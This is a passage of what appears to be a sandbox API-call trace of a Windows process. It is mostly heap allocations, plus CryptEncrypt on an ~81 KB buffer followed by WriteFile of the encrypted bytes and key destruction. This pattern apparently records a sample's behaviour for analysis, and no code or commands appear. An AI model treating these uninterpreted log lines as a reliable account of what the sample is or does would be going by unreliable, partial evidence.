0x2aa9dc0 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0090.354] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0090.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.354] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0090.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0090.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d3ef8 | out: hHeap=0x2af0000) returned 1 [0090.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0090.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0090.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0090.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.358] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0090.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.359] CryptEncrypt (in: hKey=0x9a3d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13ea7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13ea8) returned 1 [0090.359] CharLowerBuffW (in: lpsz="byte[81576]", cchLength=0xb | out: lpsz="byte[81576]") returned 0xb [0090.396] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.396] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.398] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.398] CryptEncrypt (in: hKey=0x9a3d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d3ef8*, pdwDataLen=0x8cef60*=0x13ea7, dwBufLen=0x13ea8 | out: pbData=0x37d3ef8*, pdwDataLen=0x8cef60*=0x13ea8) returned 1 [0090.403] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.403] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.403] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.403] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.403] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.403] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.413] WriteFile (in: hFile=0x294, lpBuffer=0x2a8dfe0*, nNumberOfBytesToWrite=0x13ea8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8dfe0*, lpNumberOfBytesWritten=0x8cf5e4*=0x13ea8, lpOverlapped=0x0) returned 1 [0090.415] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0090.415] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0090.745] TranslateMessage (lpMsg=0x8cf3a0) returned 0 [0090.745] DispatchMessageW (lpMsg=0x8cf3a0) returned 0x0 [0090.745] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0090.745] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0090.745] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.745] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.745] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.745] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.745] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.745] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0090.745] CryptDestroyKey (hKey=0x9a3d00) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0090.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0090.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0090.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0090.747] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0090.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.747] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0090.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.747] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0090.748] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0090.748] 